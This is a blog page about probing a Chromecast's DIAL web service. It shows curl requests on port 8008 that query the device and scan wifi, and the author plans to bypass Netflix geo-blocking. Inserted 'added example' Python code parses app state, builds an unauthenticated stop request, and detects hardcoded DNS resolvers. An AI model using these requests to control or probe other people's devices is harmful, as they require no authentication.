<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
From the DIAL developers guide</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAkFiaWvs06mFrNsTOcHia0b9zR7xKmsngGRaLy5i_Q6X9eK07Ivyf-AHHSSJsUwGxuACVsRqaeXjf9hcreY7zJmn1lmE9i8W0OjnQig1T0erFrT4f7qlfPH5r_yosvZHkCh6PdXoL-udb/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="204" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAkFiaWvs06mFrNsTOcHia0b9zR7xKmsngGRaLy5i_Q6X9eK07Ivyf-AHHSSJsUwGxuACVsRqaeXjf9hcreY7zJmn1lmE9i8W0OjnQig1T0erFrT4f7qlfPH5r_yosvZHkCh6PdXoL-udb/s320/1.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The rules of the DIAL service:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
1. First we send a DIAL request (GET) for the application (YouTube, Netflix).</div>
<div class="separator" style="clear: both; text-align: left;">
2. The DIAL server responds with OK.</div>
<div class="separator" style="clear: both; text-align: left;">
3. Then we POST the application URL in JSON format. It is effectively a URL-forwarding technique.</div>
<div class="separator" style="clear: both; text-align: left;">
4. The DIAL server responds (the Chromecast then launches its own GET/POST requests to Netflix or YouTube).</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Once an application (Netflix or YouTube) has been launched, it can be killed by issuing an HTTP DELETE.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The common HTTP requests can be found in the DIAL developer manual. <a href="http://fiquett.com/2013/07/chromecast-traffic-sniffing/">fiquett.com</a> has listed the common requests with curl examples:</div>
<pre># get device information xml:
curl http://x.x.x.x:8008/ssdp/device-desc.xml

# get detailed device information json:
curl http://x.x.x.x:8008/setup/eureka_info?options=detail

# scan for available wifi:
curl http://x.x.x.x:8008/setup/scan_results

# get supported time zones:
curl http://x.x.x.x:8008/setup/supported_timezones

# get info about current app:
curl -H "Content-Type: application/json" http://x.x.x.x:8008/apps/YouTube -X GET</pre>
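As an added example (not the post's or Google's code), here is a small Python parser for the XML that GET /apps/&lt;AppName&gt; returns, together with the rule from the DIAL specification that an application may only be killed with a DELETE on its run link while it is running and allowStop is true. The sample XML is constructed from the specification's response format, since the post only shows a screenshot, and x.x.x.x stands in for the Chromecast's address.

```python
"""Parse a DIAL application-information response and build the stop (DELETE) request.

Added example, not code from the original post. SAMPLE_APP_INFO is constructed
from the DIAL specification's application-information format; HOST is a
placeholder for the Chromecast's IP address.
"""
import xml.etree.ElementTree as ET
from urllib.parse import urljoin

DIAL_NS = {"d": "urn:dial-multiscreen-org:schemas:dial"}
HOST = "x.x.x.x"        # placeholder for the Chromecast's address
DIAL_PORT = 8008        # the port the post observed the web service on

# constructed from the DIAL spec's response to GET /apps/<AppName>
SAMPLE_APP_INFO = """\
<service xmlns="urn:dial-multiscreen-org:schemas:dial">
  <name>YouTube</name>
  <options allowStop="true"/>
  <state>running</state>
  <link rel="run" href="run"/>
</service>
"""


def app_url(app_name, host=HOST, port=DIAL_PORT):
    """GET here to query the app, POST here to launch it."""
    return "http://%s:%d/apps/%s" % (host, port, app_name)


def parse_app_info(xml_text):
    """Extract name, state, allowStop and the rel="run" link from the XML."""
    root = ET.fromstring(xml_text)
    options = root.find("d:options", DIAL_NS)
    link = root.find("d:link[@rel='run']", DIAL_NS)
    return {
        "name": root.findtext("d:name", namespaces=DIAL_NS),
        "state": root.findtext("d:state", namespaces=DIAL_NS),
        "allow_stop": options is not None
                      and options.get("allowStop", "false").lower() == "true",
        "run_href": None if link is None else link.get("href"),
    }


def stop_request(app_name, xml_text, host=HOST):
    """Return the (method, url) that kills the running app, or None if DIAL forbids it."""
    info = parse_app_info(xml_text)
    if info["state"] != "running" or not info["allow_stop"] or not info["run_href"]:
        return None
    # the run link is relative to the application resource, hence the trailing slash
    return ("DELETE", urljoin(app_url(app_name, host) + "/", info["run_href"]))


if __name__ == "__main__":
    print(parse_app_info(SAMPLE_APP_INFO))
    print(stop_request("YouTube", SAMPLE_APP_INFO))
```

Note that nothing in this exchange authenticates the caller: anyone on the same Layer 2 segment who can reach port 8008 can query, launch and stop applications, which is exactly why the captive-portal and client-isolation settings mentioned in the other posts interfere with casting.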
<div class="separator" style="clear: both; text-align: left;">
Which brings us back to the question: how does the video get streamed to us? Here is a not-quite-accurate pseudo-diagram, but it is sufficient.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWIv6bIBn6_-4sh1i_yQcwh9AV4cwZbi5hUGK1o0zWqU5Iq3SfItiLaQvul3ZOS76YBkAX1rGa2sylS82RORZX8JEHtPFgLKwbzaHTMHWxu0MbKYbqxI-s_6JMXb516VfHcto1jJzVjJcy/s1600/cdraw.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="203" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWIv6bIBn6_-4sh1i_yQcwh9AV4cwZbi5hUGK1o0zWqU5Iq3SfItiLaQvul3ZOS76YBkAX1rGa2sylS82RORZX8JEHtPFgLKwbzaHTMHWxu0MbKYbqxI-s_6JMXb516VfHcto1jJzVjJcy/s320/cdraw.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
By now you should have at least an idea of how to bypass it. If not, you can wait for Part 3.</div>
</div>
<h2>Chromecast Experience in .MY Part 1. (2013-09-12)</h2>
<div dir="ltr" style="text-align: left;" trbidi="on">
Living is not that easy these days. The cost of living has increased to a point where a mere average-salary guy like me has a bit of trouble coping with my current life. Yeah, I admit I do have some sort of financial difficulty. But Alhamdulillah, I am blessed with good family and friends who are willing to help me in surviving the capitalistic nature of today's modernity. <br />
<div>
<br /></div>
<div>
Nonetheless, the difficulties in one's life shouldn't be a burden to the soul in the quest of acquiring new knowledge.</div>
<div>
A few months back, Google released the Chromecast: "A device that makes your Smart TV smarter".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwPhmhBt-snt3y3hU5tsvcXsLNCKZhaZI4W6s3fMwThOmX-UMMLUTTT0GDDLINgAgCuVHs_DCwUGncojmaowDENJBoYntkUIOGkgsrf-whGzkeCESvMWaTzVBlkZ07xoT31gwn-UU4qBOn/s1600/IMG_2482.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwPhmhBt-snt3y3hU5tsvcXsLNCKZhaZI4W6s3fMwThOmX-UMMLUTTT0GDDLINgAgCuVHs_DCwUGncojmaowDENJBoYntkUIOGkgsrf-whGzkeCESvMWaTzVBlkZ07xoT31gwn-UU4qBOn/s320/IMG_2482.JPG" width="240" /></a></div>
<br />
It cost us 35 bucks + 6 dollars shipping. Thanks to a friend of mine, Amir Shahir, who kindly bought it for me.<br />
iFixit has done a teardown for us. You can look on their <a href="http://www.ifixit.com/Teardown/Chromecast+Teardown/16069/1?singlePage">website</a> to see the inside of the Chromecast.<br />
<br /></div>
<div>
Powering up the device is straightforward. Simply plug it into your HDMI port and into USB for power, and it will boot.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyssOS0F2VRe0fX5TaPFQ0jWnMiztE5NrWrxxuMxi2julPdJPqKew2KivVxNAVUYOyFvvtwBsmyqsDZzJhlKIEoZPOnW1m2DhE5E4p0SDAJ290wEo0t15oABD1BkMpHgIEJfGG3PqPaS-p/s1600/IMG_2483.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyssOS0F2VRe0fX5TaPFQ0jWnMiztE5NrWrxxuMxi2julPdJPqKew2KivVxNAVUYOyFvvtwBsmyqsDZzJhlKIEoZPOnW1m2DhE5E4p0SDAJ290wEo0t15oABD1BkMpHgIEJfGG3PqPaS-p/s320/IMG_2483.JPG" width="240" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
On my Sharp TV</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpMBFqVtSie6sOycadkfvhxyAgnfPvaWFzMDknPKjVZAkrUQuNW8-B4JHOc9TNLBtMQGrgLSTrFIzNd6cbMRSdcZOeBvPWGzTyNtkSDWSb_GWjWzC2RIQGlHypONPYPMLM4VULZ0KVD53b/s1600/IMG_2484+-+Copy.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpMBFqVtSie6sOycadkfvhxyAgnfPvaWFzMDknPKjVZAkrUQuNW8-B4JHOc9TNLBtMQGrgLSTrFIzNd6cbMRSdcZOeBvPWGzTyNtkSDWSb_GWjWzC2RIQGlHypONPYPMLM4VULZ0KVD53b/s320/IMG_2484+-+Copy.JPG" width="320" /></a></div>
<br />
Yeah, it's upside down, dunno why.<br />
<br />
Anyway, the Chromecast as a whole is actually a custom lightweight web browser with HTML5 + JavaScript + CSS support. You can cast your content over WebRTC (since WebRTC supports peer connections) or forward certain streaming sites' requests, such as YouTube and Netflix (at this moment).<br />
<br />
Unfortunately we're living outside of the States, so surfing Netflix is going to be a bit of a problem. Viewing geo-locked content is not a problem for PC users, since a lot of proxies and VPNs can be used to bypass the protection.<br />
<br />
That's not the situation with the Chromecast. This pricey small thing is a bad-ass. You couldn't rig it at all. The DNS resolver is hardcoded in the device itself. <a href="http://wiki.gtvhacker.com/index.php/Google_Chromecast#Bootloader_Exploit_Package">One could root the device with a previous firmware</a>. But Google is also playing evil by updating the device's firmware without notifying the user; the same goes for Google Chrome.<br />
<br />
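Added example (not code from the original post): the hardcoded resolver described above is visible on the wire, because the device keeps sending DNS to its own resolver instead of the one DHCP advertises. The script below takes a constructed flow summary (the kind a router's connection tracker or a capture summary gives you) and reports every LAN host that talks DNS to a foreign resolver, separating devices that never use the LAN resolver at all from hosts that merely mix. The addresses, the LAN resolver and the flow lines are all constructed samples.<br />

```python
"""Flag LAN devices whose DNS queries go to a resolver other than the one DHCP
advertises, the on-the-wire symptom of a hardcoded resolver like the one the
post describes on the Chromecast.  Added example, not code from the post.  The
flow lines, the LAN resolver address and the device addresses are constructed."""
from collections import defaultdict

# Constructed flow summary, one flow per line: "<src> <dst> <proto> <dport>".
SAMPLE_FLOWS = """\
192.168.0.10 192.168.0.1 udp 53
192.168.0.10 93.184.216.34 tcp 443
192.168.0.23 8.8.8.8 udp 53
192.168.0.23 8.8.8.8 udp 53
192.168.0.23 74.125.24.91 tcp 443
192.168.0.42 192.168.0.1 udp 53
192.168.0.42 8.8.4.4 tcp 53
"""

LAN_RESOLVER = "192.168.0.1"  # the DNS server DHCP hands out (constructed)


def parse_flows(text):
    """Turn the flow summary into (src, dst, proto, dport) tuples, skipping
    blank or malformed lines instead of failing on them."""
    flows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4 or not parts[3].isdigit():
            continue
        src, dst, proto, dport = parts
        flows.append((src, dst, proto.lower(), int(dport)))
    return flows


def dns_targets_by_host(flows):
    """Map each source host to the set of addresses it sent DNS (port 53) to."""
    targets = defaultdict(set)
    for src, dst, proto, dport in flows:
        if dport == 53 and proto in ("udp", "tcp"):
            targets[src].add(dst)
    return targets


def find_foreign_resolvers(flows, allowed=frozenset({LAN_RESOLVER})):
    """Return {host: {"foreign": [...], "uses_lan_resolver": bool}} for every
    host that sent DNS to an address outside `allowed`.  uses_lan_resolver False
    means the host never used the advertised resolver at all, which is what a
    device with a hardcoded resolver looks like; True means it mixes, which is
    more often an application-level override than a device setting."""
    report = {}
    for host, resolvers in dns_targets_by_host(flows).items():
        foreign = sorted(resolvers - allowed)
        if foreign:
            report[host] = {
                "foreign": foreign,
                "uses_lan_resolver": bool(resolvers & allowed),
            }
    return report


if __name__ == "__main__":
    report = find_foreign_resolvers(parse_flows(SAMPLE_FLOWS))
    for host, info in sorted(report.items()):
        kind = "mixed" if info["uses_lan_resolver"] else "hardcoded?"
        print(f"{host}: {', '.join(info['foreign'])} ({kind})")
```

Once such a device is identified, the answer is a gateway-level DNS egress policy rather than a device setting, since the device offers none: the usual choice is to only permit port 53 to the local resolver and log everything else.<br />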
Solutions?<br />
<br />
If you cannot customize/root the device, then you make the device's software behave as if it were rooted. So for the past 48 hours I've been analysing the Chromecast's traffic and studying the art of bypassing an unbypassable device. Hey presto, the solution is simple; I managed to sketch it on a nice A4.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAeIR44eUBQE96XyFLaluMBDlwn3wMvYAAWTLM7vAEyPw4alWILQHszrKm8xobLX7DMOp6j-rRNEWhWmqUOnJsSWLJi1U0sCHUX2KuiaNQse-mjakzBZsFfAKB4TdHJ54_smQhlCjWlnpM/s1600/IMG_2481.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAeIR44eUBQE96XyFLaluMBDlwn3wMvYAAWTLM7vAEyPw4alWILQHszrKm8xobLX7DMOp6j-rRNEWhWmqUOnJsSWLJi1U0sCHUX2KuiaNQse-mjakzBZsFfAKB4TdHJ54_smQhlCjWlnpM/s320/IMG_2481.JPG" width="320" /></a></div>
<br />
<br />
<br />
Continued soon...<br />
Just in case nobody believes me: it's possible even using a Telekom-branded DIR-615...<br />
<br />
<br /></div>
</div>